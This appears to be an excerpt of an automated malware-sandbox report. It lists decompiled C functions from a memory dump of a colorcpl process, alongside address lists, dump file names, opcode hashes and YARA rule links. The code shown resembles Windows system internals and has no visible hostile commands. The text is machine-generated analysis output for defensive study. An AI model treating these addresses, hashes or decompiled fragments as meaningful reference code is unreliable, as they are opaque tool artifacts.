                                                                                                0x06ecfe4e
                                                                                                0x06ecfe58
                                                                                                0x06ecfe5d
                                                                                                0x06ecfe5f
                                                                                                0x06ecfe6a
                                                                                                0x06ecfe72
                                                                                                0x06ecfe75
                                                                                                0x06ecfe78
                                                                                                0x06ecfe83
                                                                                                0x06ecfe95
                                                                                                0x06ecfe85
                                                                                                0x06ecfe8e
                                                                                                0x06ecfe8e
                                                                                                0x06ecfea0
                                                                                                0x06ecfea1
                                                                                                0x06ecfea3
                                                                                                0x06ecfea8
                                                                                                0x06ecfebd

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 18281e2ccb720aba735673be0c4f58b70f6ae5a3427b3a87c65addcb37607eb5
                                                                                                • Instruction ID: c2fb4ac530195ae268b5033e6bb34c76494b2a39b19c1c16f895f50abd5750ae
                                                                                                • Opcode Fuzzy Hash: 18281e2ccb720aba735673be0c4f58b70f6ae5a3427b3a87c65addcb37607eb5
                                                                                                • Instruction Fuzzy Hash: DE018471E0035CAFDB54DFA9D845FAEB7BCEF44710F00406AB910AB281DA70DA01CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE1074 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06EE1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E06EE165E(__ebx, 0x6f08ae4, (__edx -  *0x6f08b04 >> 0x14) + (__edx -  *0x6f08b04 >> 0x14), __edi, __ecx, (__edx -  *0x6f08b04 >> 0x14) + (__edx -  *0x6f08b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E06EDAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E06E37D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E06ECFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                                0x06ee1074
                                                                                                0x06ee1080
                                                                                                0x06ee1082
                                                                                                0x06ee108a
                                                                                                0x06ee108f
                                                                                                0x06ee1093
                                                                                                0x06ee10ab
                                                                                                0x06ee10ab
                                                                                                0x06ee10c3
                                                                                                0x06ee10cf
                                                                                                0x06ee10e1
                                                                                                0x06ee10d1
                                                                                                0x06ee10da
                                                                                                0x06ee10da
                                                                                                0x06ee10e9
                                                                                                0x06ee10f5
                                                                                                0x06ee10f5
                                                                                                0x06ee10fe

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a3aa9445d4b7f8e5d6ce3eb5a3290f13231a5e632ac94447efb80b451aec87b2
                                                                                                • Instruction ID: 3ee0b93acd32d44cf3b69f29800d9e4105df21198f89eb1501dfb2255e2f2dbb
                                                                                                • Opcode Fuzzy Hash: a3aa9445d4b7f8e5d6ce3eb5a3290f13231a5e632ac94447efb80b451aec87b2
                                                                                                • Instruction Fuzzy Hash: 78014C725047459FCBD0EF68CD04B5A77E9AB84314F049529F89583690EE30D595CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E2B02A Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E2B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E06E37D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E06E97016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                0x06e2b037
                                                                                                0x06e2b039
                                                                                                0x06e2b03b
                                                                                                0x06e2b040
                                                                                                0x06e7a60e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7a61d
                                                                                                0x06e2b04b
                                                                                                0x06e2b04e
                                                                                                0x06e7a627
                                                                                                0x06e7a634
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7a641
                                                                                                0x06e7a653
                                                                                                0x06e7a643
                                                                                                0x06e7a64c
                                                                                                0x06e7a64c
                                                                                                0x06e7a65b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7a66c
                                                                                                0x06e2b057
                                                                                                0x06e2b057
                                                                                                0x06e2b057
                                                                                                0x06e2b046
                                                                                                0x06e2b046
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                • Instruction ID: 92201d0f7e788c02822b91ff4ecba56a38c7cb8b5e41cef936486eeb83fa9d63
                                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                • Instruction Fuzzy Hash: A501B131610780DFD762875CC948F6A77EDEB41658F0910A1E915CB651E628DC40C660
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE8ED6 Relevance: .0, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 54%
                                                                                                			E06EE8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x6f0d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E06E37D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                                0x06ee8ed6
                                                                                                0x06ee8ee5
                                                                                                0x06ee8eed
                                                                                                0x06ee8ef0
                                                                                                0x06ee8efa
                                                                                                0x06ee8f03
                                                                                                0x06ee8f0c
                                                                                                0x06ee8f15
                                                                                                0x06ee8f24
                                                                                                0x06ee8f27
                                                                                                0x06ee8f31
                                                                                                0x06ee8f43
                                                                                                0x06ee8f33
                                                                                                0x06ee8f3c
                                                                                                0x06ee8f3c
                                                                                                0x06ee8f4e
                                                                                                0x06ee8f4f
                                                                                                0x06ee8f51
                                                                                                0x06ee8f56
                                                                                                0x06ee8f69

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ee0c176bac40c59f9f4278edf7ff8e251f7e86a96829108bcf437fd7f1b94475
                                                                                                • Instruction ID: 5c20314f13d96f90c20e0e59dde42ae760cbbf3bf94f5d6f4a93fa391cf91197
                                                                                                • Opcode Fuzzy Hash: ee0c176bac40c59f9f4278edf7ff8e251f7e86a96829108bcf437fd7f1b94475
                                                                                                • Instruction Fuzzy Hash: 31111E70E003599FDB44DFA8D841BAEB7F4FF08300F1442AAE918EB382E6349940CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE8A62 Relevance: .0, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 54%
                                                                                                			E06EE8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x6f0d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E06E37D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E06E5B640(E06E59AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                0x06ee8a62
                                                                                                0x06ee8a71
                                                                                                0x06ee8a79
                                                                                                0x06ee8a82
                                                                                                0x06ee8a85
                                                                                                0x06ee8a89
                                                                                                0x06ee8a8c
                                                                                                0x06ee8a8f
                                                                                                0x06ee8a92
                                                                                                0x06ee8a95
                                                                                                0x06ee8a9f
                                                                                                0x06ee8ab1
                                                                                                0x06ee8aa1
                                                                                                0x06ee8aaa
                                                                                                0x06ee8aaa
                                                                                                0x06ee8abc
                                                                                                0x06ee8abd
                                                                                                0x06ee8abf
                                                                                                0x06ee8ac4
                                                                                                0x06ee8ada

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1ee57572ceb91107d256c32d1fee82f18bc70230a3ab878d0687efd8d84df12a
                                                                                                • Instruction ID: 4a0d3cf9ba036bee5fe7ee71649ecc1de1c9775c0bcdb251ba73709b7a5c2f0a
                                                                                                • Opcode Fuzzy Hash: 1ee57572ceb91107d256c32d1fee82f18bc70230a3ab878d0687efd8d84df12a
                                                                                                • Instruction Fuzzy Hash: 9C011AB1A0031CAFDB44DFA9D9419EEB7B8EF48350F10405AF914E7381E634A900CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1DB60 Relevance: .0, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E1DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E06E1DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E06E1E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L06E1E8B0(__ecx, _t14, 0xfff);
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                                0x06e1db64
                                                                                                0x06e1db66
                                                                                                0x06e1db6b
                                                                                                0x06e1dbaa
                                                                                                0x06e1db71
                                                                                                0x06e1db76
                                                                                                0x06e1db7a
                                                                                                0x06e1dba3
                                                                                                0x06e1db7c
                                                                                                0x06e1db87
                                                                                                0x06e1db8b
                                                                                                0x06e74fa1
                                                                                                0x06e74fb3
                                                                                                0x06e74fb8
                                                                                                0x06e1db91
                                                                                                0x06e1db96
                                                                                                0x06e1db98
                                                                                                0x06e1db98
                                                                                                0x06e1db8b
                                                                                                0x06e1db7a
                                                                                                0x06e1db9d
                                                                                                0x06e1dba2

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                • Instruction ID: 129e4b7c761459d0e8566709ea22bf9c50d250610ab90bc283b9cc31628d7ab8
                                                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                • Instruction Fuzzy Hash: F2F0FC736017329FE7B65A558C84FA7B6999FC1A60F151035F5079F348CA608C02E6D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1B1E1 Relevance: .0, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E1B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E06E37D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E06E37D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E06E97016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                0x06e1b1e8
                                                                                                0x06e1b1ea
                                                                                                0x06e1b1f3
                                                                                                0x06e74a17
                                                                                                0x06e1b1f9
                                                                                                0x06e1b1f9
                                                                                                0x06e1b1f9
                                                                                                0x06e1b201
                                                                                                0x06e74a21
                                                                                                0x06e74a2e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e74a3b
                                                                                                0x06e74a4d
                                                                                                0x06e74a3d
                                                                                                0x06e74a46
                                                                                                0x06e74a46
                                                                                                0x06e74a55
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e1b20a
                                                                                                0x06e1b20a
                                                                                                0x06e1b20a
                                                                                                0x06e1b20a

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                • Instruction ID: 41ce773c92b1e8424dc4f788bf1a6f336b758bd42a1494df1bb491ec3bcd2498
                                                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                • Instruction Fuzzy Hash: 0601D632A10784DFD7A2975DC804F997BD8EF41754F091071F9148B6B1E675C800D654
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EAFE87 Relevance: .0, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E06EAFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x6f0d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E06E37D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                                0x06eafe96
                                                                                                0x06eafe9e
                                                                                                0x06eafea1
                                                                                                0x06eafead
                                                                                                0x06eafeb3
                                                                                                0x06eafeb9
                                                                                                0x06eafec3
                                                                                                0x06eafed5
                                                                                                0x06eafec5
                                                                                                0x06eafece
                                                                                                0x06eafece
                                                                                                0x06eafee0
                                                                                                0x06eafee1
                                                                                                0x06eafee3
                                                                                                0x06eafee8
                                                                                                0x06eafefb

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3168338773944e5adf817868c0b3f423aaf691b7660ddd8a2ea70e6198478577
                                                                                                • Instruction ID: 9a206ad76f9e8ca9f47c2b3b0ce0446f26efd60431fc2df2faf12215ca95bc0e
                                                                                                • Opcode Fuzzy Hash: 3168338773944e5adf817868c0b3f423aaf691b7660ddd8a2ea70e6198478577
                                                                                                • Instruction Fuzzy Hash: 86014F70A0030CAFCB54DFA8D946A6EB7B4EF08314F105159A914DB382D635E901CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE8F6A Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 48%
                                                                                                			E06EE8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x6f0d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E06E37D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                0x06ee8f6a
                                                                                                0x06ee8f79
                                                                                                0x06ee8f81
                                                                                                0x06ee8f84
                                                                                                0x06ee8f8b
                                                                                                0x06ee8f91
                                                                                                0x06ee8f94
                                                                                                0x06ee8f9e
                                                                                                0x06ee8fb0
                                                                                                0x06ee8fa0
                                                                                                0x06ee8fa9
                                                                                                0x06ee8fa9
                                                                                                0x06ee8fbb
                                                                                                0x06ee8fbc
                                                                                                0x06ee8fbe
                                                                                                0x06ee8fc3
                                                                                                0x06ee8fd6

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5ef879ce221deda0ce382cf47f2425eca8abc87f7c35b5d869262c22956cf3f1
                                                                                                • Instruction ID: c2ad603a3debcefc29f11cde3b1f6657252a5aae7122961a25857ca73218bba9
                                                                                                • Opcode Fuzzy Hash: 5ef879ce221deda0ce382cf47f2425eca8abc87f7c35b5d869262c22956cf3f1
                                                                                                • Instruction Fuzzy Hash: 7701E174A0134CAFDB44DFA8D945AAEB7B4EF48300F505459B915EB381EA74DA00CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED131B Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 48%
                                                                                                			E06ED131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x6f0d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E06E37D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                0x06ed131b
                                                                                                0x06ed132a
                                                                                                0x06ed1330
                                                                                                0x06ed1336
                                                                                                0x06ed133e
                                                                                                0x06ed1341
                                                                                                0x06ed1344
                                                                                                0x06ed134f
                                                                                                0x06ed1361
                                                                                                0x06ed1351
                                                                                                0x06ed135a
                                                                                                0x06ed135a
                                                                                                0x06ed136c
                                                                                                0x06ed136d
                                                                                                0x06ed136f
                                                                                                0x06ed1374
                                                                                                0x06ed1387

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e0ff0a8fa44e43054c1dfb849c371003f3f9377e8f97046be8f88c19318e312b
                                                                                                • Instruction ID: ce07a1f72dbe91835727ff603707318eb4d7e90ecb8bcf4d41bf809766469b2c
                                                                                                • Opcode Fuzzy Hash: e0ff0a8fa44e43054c1dfb849c371003f3f9377e8f97046be8f88c19318e312b
                                                                                                • Instruction Fuzzy Hash: CD011D71A0134CAFDB84DFA9D945AAEB7F4FF08700F414059F915EB341E6749A00CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED1608 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E06ED1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x6f0d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E06E37D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                                0x06ed1608
                                                                                                0x06ed1617
                                                                                                0x06ed161d
                                                                                                0x06ed1625
                                                                                                0x06ed1628
                                                                                                0x06ed162b
                                                                                                0x06ed1636
                                                                                                0x06ed1648
                                                                                                0x06ed1638
                                                                                                0x06ed1641
                                                                                                0x06ed1641
                                                                                                0x06ed1653
                                                                                                0x06ed1654
                                                                                                0x06ed1656
                                                                                                0x06ed165b
                                                                                                0x06ed166e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
